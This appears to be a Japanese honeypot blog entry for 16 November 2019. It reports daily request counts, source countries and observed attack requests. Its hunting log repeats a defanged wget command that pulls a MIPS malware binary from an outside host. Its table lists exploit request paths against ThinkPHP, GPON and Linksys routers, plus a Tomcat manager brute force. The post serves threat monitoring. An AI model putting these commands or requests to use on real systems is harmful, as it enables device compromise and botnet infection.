23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(245日目)

2019/11/16(土)

トータルは4077件でした。

ハンティングログは以下です。

79.70.181[.]214 wget+hxxp[:]//185.172.110[.]220/mipsel
222.164.198[.]216 wget+hxxp[:]//185.172.110[.]220/mipsel
85.186.208[.]122 wget+hxxp[:]//185.172.110[.]220/mipsel
137.27.38[.]250 wget+hxxp[:]//185.172.110[.]220/mipsel
50.35.111[.]131 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

イタリア 4002
アメリ 17
中国 11
オランダ 8
フランス 7
ブラジル 7
ドイツ 4
ウクライナ 3
ベトナム 2
ポーランド 2
インド 2
チェコ 1
ルーマニア 1
イギリス 1
マレーシア 1
リベリア 1
シンガポール 1
台湾 1
スウェーデン 1
メキシコ 1
ミャンマー 1
ロシア 1
香港 1

f:id:sec23:20191206142813p:plain

件数 概要 リクエス
4002 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
44 アクセス GET /
5 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
5 調査 GET /script
3 ログインページ調査 POST /Login.htm
3 phpMyAdminの調査 GET /admin-scripts.asp
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 GPONルータの脆弱性を狙った通信 POST /GponForm/diag_Form?images/
2 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 不明 GET /dd/
1 cPanelの調査? GET /cpanel
1 不正中継の試み CONNECT ishin-production.aktsk.jp:443